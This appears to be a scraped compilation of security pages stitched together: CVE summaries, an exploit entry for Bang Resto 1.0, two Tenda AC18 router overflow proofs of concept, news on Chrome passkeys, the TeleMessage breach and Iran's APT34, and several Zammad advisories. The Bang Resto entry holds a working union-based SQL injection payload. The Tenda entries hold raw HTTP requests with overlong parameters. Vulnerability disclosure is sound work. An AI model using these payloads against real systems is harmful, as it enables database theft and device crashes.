An issue found in Agasio-Camera device version not specified allows a remote attacker to execute arbitrary code via the check and authLevel parameters.

CVE-2023-29862

Bang Resto version 1.0 suffers from multiple SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to nu11secur1ty in December of 2022.

    # Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection# Date: 2023-04-02# Exploit Author: Rahad Chowdhury# Vendor Homepage:https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html# Software Link:https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip# Version: 1.0# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-29849*Affected Parameters:*btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],itemqty[], btnMenuItemID*Steps to Reproduce:*1. First login your staff panel.2. then go to "order" menu and Select menu then create order and interceptrequest data using burp suite.so your request data will be:POST /bangresto/staff/displayitem.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/111.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 194Origin: http://127.0.0.1Referer: http://127.0.0.1/bangresto/staff/order.phpCookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5Connection: closebtnMenuItemID=1&qty=13. "btnMenuItemID" parameter is vulnerable. Let's try to inject union basedSQL Injection use this query ".1 union select1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())---" in "btnMenuItemID" parameter.4. Check browser you will see user, database and version informations.

Bang Resto 1.0 SQL Injection

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow. via function formWifiWpsOOB.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsOOB function, which can be accessed through the URL goform/WifiWpsOOB .

The index is controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check, which leads to a stack overflow vulnerability. An attacker can obtain a stable root shell through a carefully constructed payload.

**PoC**

Poc of Denial of Service(DoS)

POST /goform/WifiWpsOOB HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 336
Origin: http://192.168.0.1
DNT: 1
Connection: close
Referer: http://192.168.0.1/index.html
Cookie: ecos\_pw=eee:language=cn

index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-44178: IoT_vuln/Tenda/AC18/formWifiWpsOOB at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg.

Permalink

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetMacFilterCfg function, which can be accessed through the URL goform/SetMacFilterCfg.

Go to the function sub_C1334

Go to the function sub_C15F8

In formSetMacFilterCfg function, deviceList is controllable and finally will be passed into the sub_C15F8 function.

In the sub_C15F8 function, it is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.0.1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: \*/\*
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Content\-Type: application/x\-www\-form\-urlencoded; charset\=UTF\-8
X\-Requested\-With: XMLHttpRequest
Content\-Length: 51
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/iptv.html?random\=0.7642888131213508&
Cookie: password\=7c90ed4e4d4bf1e300aa08103057ccbcmho1qw

macFilterType\=1&deviceList\=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-44175: IoT_vuln/readme.md at main · RobinWang825/IoT_vuln

Google on Thursday unveiled a Password Manager PIN to let Chrome web users sync their passkeys across Windows, macOS, Linux, ChromeOS, and Android devices.
"This PIN adds an additional layer of security to ensure your passkeys are end-to-end encrypted and can't be accessed by anyone, not even Google," Chrome product manager Chirag Desai said.
The PIN is a six-digit code by default, although it's

Encryption / Digital Security

Google on Thursday unveiled a Password Manager PIN to let Chrome web users sync their passkeys across Windows, macOS, Linux, ChromeOS, and Android devices.

"This PIN adds an additional layer of security to ensure your passkeys are end-to-end encrypted and can't be accessed by anyone, not even Google," Chrome product manager Chirag Desai said.

The PIN is a six-digit code by default, although it's also possible to create a longer alpha-numeric PIN by selecting "PIN options."

This marks a change from the previous status quo where users could only save passkeys to save passkeys to Google Password Manager on Android.

While the passkeys could be used on other platforms, it was necessary to scan a QR code using the device where they were generated.

The latest change removes that step, making it a lot easier for users to sign in to online services using passkeys by simply scanning their biometrics. Google noted that support for iOS is expected to arrive soon.

This, however, requires the users to know either the Password Manager PIN or the screen lock for their Android devices before using passkeys on a new device.

"These recovery factors will allow you to securely access your saved passkeys and sync new ones across your computers and Android devices," Desai said.

The development comes as the tech giant said passkeys are being used by more than 400 million Google accounts as of May 2024. Two months later, the phishing-resistant alternative was made available to high-risk users via its Advanced Protection Program (APP).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chrome Users Can Now Sync Passkeys Across Devices with New Google PIN Feature

CBP says it has “disabled” its use of TeleMessage following reports that the app, which has not cleared the US government’s risk assessment program, was hacked.

The United States Customs and Border Protection agency confirmed on Wednesday that it uses at least one communication app made by the service TeleMessage, which creates clones of popular apps like Signal and WhatsApp with the addition of an archiving mechanism for compliance with records-retention rules.

“Following the detection of a cyber incident, CBP immediately disabled TeleMessage as a precautionary measure,” CBP spokesperson Rhonda Lawson tells WIRED. “The investigation into the scope of the breach is ongoing.”

President Donald Trump's now former national security adviser Mike Waltz was photographed last week using TeleMessage Signal during a cabinet meeting, and the photo seemed to show that he was communicating with other high-ranking officials, including Vice President JD Vance, US director of national intelligence Tulsi Gabbard, and what appears to be US secretary of state Marco Rubio.

In the days since the photo was published, TeleMessage has reportedly suffered a series of breaches that illustrate concerning security flaws. Analysis of the app's Android source code also appears to indicate fundamental flaws in the service's security scheme. As these findings emerged, TeleMessage—an Israeli company that completed an acquisition last year by the US-based company Smarsh—imposed a service pause on its products pending investigation.

“TeleMessage is investigating a potential security incident. Upon detection, we acted quickly to contain it and engaged an external cybersecurity firm to support our investigation,” a Smarsh spokesperson told WIRED in a statement on Monday. “Out of an abundance of caution, all TeleMessage services have been temporarily suspended. All other Smarsh products and services remain fully operational.”

WIRED contacted CBP about its potential use of the software after some data stolen from TeleMessage in one of the recent breaches indicated that CBP was potentially a customer.

US senator Ron Wyden called for the Department of Justice to investigate TeleMessage in a letter on Tuesday, alleging that the service is “a serious threat to US national security.” TeleMessage is a federal contractor, but the consumer apps it offers are not approved for use under the US government's Federal Risk and Authorization Management Program, or FedRAMP. In his letter, Wyden referenced that “several federal agencies” use TeleMessage, asserting that the company “sold dangerously insecure communications software to the White House and other federal agencies.”

There is still no complete public accounting of US government officials and agencies that have used the software.

Customs and Border Protection Confirms Its Use of Hacked Signal Clone TeleMessage

Increasing attacks by the OilRig/APT34 group linked to Iran's Ministry of Intelligence and Security show that the nation's capabilities are growing, and targeting regional allies and enemies alike.

Source: Novikov Aleksey via Shutterstock

In its latest cyberattack on a Middle Eastern nation using its proxies in cyberspace, Iran continues to ramp up its cyber operations against rivals and allies.

In the attack, a cyberespionage group linked to Iran's Ministry of Intelligence and Security (MOIS) and known as APT34 targeted government ministries in Iraq, a nation that was once an enemy and now is sometimes a rival and sometimes an ally of Iran. The attack had all the hallmarks of the group, also known as Hazel Sandstorm: custom infrastructure using email tunneling for communications, use of two malware programs similar to previous APT34 code, and domain-naming schemes similar to previous operations.

Previous attacks by APT34 (aka OilRig, Helix Kitten, and Hazel Sandstorm) using similar tools and methods targeted other nations in the region, including Jordan, Lebanon, and Pakistan, according to an analysis by cybersecurity firm Check Point's research group.

"The goal is likely espionage, because those countries are at least, to some degree, allies of Iran, so I don't think, in this case, the main goal is destruction," says Sergey Shykevich, threat intelligence group manager at Check Point Research. "We also don't have any hints on the technological side that there is any destructive goal, and from what we do see — specifically in Iraq — we clearly see that the goal is data exfiltration and \[the like\]."

Following the start of the conflict between Israel and Hamas nearly a year ago, rivalries and relationships throughout the region have changed. In late spring, Iran criticized Jordan — and to a lesser extent other Arab nations — for reportedly helping Israel track and interdict missiles during Iran's April 13 attack on the Jewish nation. Meanwhile, Iraq continues to have strong ties to Iran through proxy networks and political parties aligned with Iran.

**Iran's Cyber Operations Grow**

At the same time, Iran has expanded its cyber operations strategy in the region. A group linked to the Iranian Islamic Revolutionary Guard Corps (IRGC) — and known variously as APT33 (Mandiant) and Peach Sandstorm (Microsoft) — has targeted communications equipment, government agencies, and the oil-and-gas industry in the United Arab Emirates and the United States, typically to gather intelligence, Microsoft stated in August.

Late last month, the US Cybersecurity and Infrastructure Security Agency (CISA) warned that the Iranian group Lemon Sandstorm, also known as Fox Kitten, had leveled ransomware attacks against various countries, and another group, Charming Kitten, or APT42, targeted individuals associated with both the Democratic and Republican presidential campaigns.

Iran is increasingly flexing its muscles in cyberspace, and especially against rivals throughout the Middle East region, says Mohamed Fahmy, a cyberthreat intelligence researcher with cybersecurity firm Trend Micro.

"Iranian APT groups, including APT34, have become very active recently in targeting the Middle East, particularly the government sector in the Gulf region," he says. "From what we’ve seen of APT34’s toolset and activities, they aim to infiltrate entities as much as possible, leveraging compromised infrastructure to launch further attacks. ... APT34's primary goals seem to be espionage and stealing sensitive government information."

**Evasive New Malware: Veaty and Spearal**

In the latest campaign, APT34 used fake document attachments targeting Iraq between March and May of this year, and likely used social engineering to convince users to open the links and run an installer. The attack results in the installation a .NET backdoor. Currently, one backdoor is called Veaty and the other Spearal, and both malware binaries allow command-and-control (C2) of compromised systems.

The techniques used by Veaty and Spearal show similarities to two other malware families — known as Karkoff and Saitama — both of which are attributed to APT34, Check Point stated in its analysis.

Iranian cyber operations groups tend to use custom DNS tunneling protocols and a C2 channel based on email subject lines, according to the research: "This distinctive blend of straightforward tools, written in .NET, combined with sophisticated C2 infrastructure, is common among similar Iranian threat actors."

The capabilities of APT34 and Iran's other groups will only increase, says Check Point's Shykevich.

"They just improve it," he says. "They just use the same content, but each target, or each country they attack, they deploy a new generation of the same concept ..., where they improve it and make it more stealthy \[or add other features\]."

Companies in the Middle East should focus on implementing a zero-trust architecture to strengthen defenses, including establishing a mature security operations center (SOC) with managed endpoint detection and response (MDR) capabilities, says Trend Micro's Fahmy.

The increased geopolitical tensions in the region will only mean increasing efforts to gain intelligence through cyberattacks, he says.

"Government sectors in the Middle East and Gulf region should take this threat seriously," he says. "These groups aim to blend into the network environment by customizing their malware to avoid detection, \[so\] understanding their techniques, which have not changed significantly, is crucial."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

As Geopolitical Tensions Mount, Iran's Cyber Operations Grow

In Zammad 5.0.2, agents can configure "out of office" periods and substitute persons. If the substitute persons didn't have the same permissions as the original agent, they could receive ticket notifications for tickets that they have no access to.

Security Advisory

December 7, 2021 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2021-21
*   Date: 12/07/2021
*   Title: Information Disclosure
*   Severity: low
*   Product: Zammad 5.0.2
*   Fixed in: Zammad 5.0.3
*   References:  
    \--> \[pending CVE assignment\]

**Vulnerability Descriptions****Information Disclosure**

In Zammad, agents can configure "out of office" periods and substitute persons. If the substitute persons didn't have the same permissions as the original agent, they could receive ticket notifications for tickets that they have no access to.

Special 🙏 and 🤘 and ❤️ to:

*   N: Heiko Stämmler
*   C: Heista GmbH
*   W: https://www.heista.de/

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/  
    Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2021-21

Send all remarks on security issues to security@zammad.com.

CVE-2021-44886: Security Advisory ZAA-2021-21 | Zammad

A lack of rate limiting in the 'forgot password' feature of Zammad v5.1.0 allows attackers to send an excessive amount of reset requests for a legitimate user, leading to a possible Denial of Service (DoS) via a large amount of generated e-mail messages.

Security Advisory

April 20, 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-04
*   Date: 04/20/2022
*   Title: Denial Of Service
*   Severity: low
*   Product: Zammad 5.1.x
*   Fixed in: Zammad 5.1.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Denial Of Service**

Due to a missing rate limiting in the 'forgot password' feature of Zammad, an attacker could send many requests for a known account to cause Denial Of Service by many generated emails which would also spam the victim.

Special 🙏 and 🤘 and ❤️ to:

*   C: YouPlant
*   W: https://youplant.com/

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/  
    Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-04

Send all remarks on security issues to security@zammad.com.

CVE-2022-29701: Security Advisory ZAA-2022-04 | Zammad

In Zammad 5.2.0, an attacker could manipulate the rate limiting in the 'forgot password' feature of Zammad, and thereby send many requests for a known account to cause Denial Of Service by many generated emails which would also spam the victim.

Security Advisory

5\. Juli 2022 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2022-05
*   Date: 07/05/2022
*   Title: Denial Of Service
*   Severity: low
*   Product: Zammad 5.2.x
*   Fixed in: Zammad 5.2.1
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Denial Of Service**

An attacker could manipulate the rate limiting in the 'forgot password' feature of Zammad, and thereby send many requests for a known account to cause Denial Of Service by many generated emails which would also spam the victim.

Special 🙏 and 🤘 and ❤️ to:

*   N: Joe Helle
*   W: https://themayor.tech/

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/

Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2022-05

Send all remarks on security issues to security@zammad.com.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us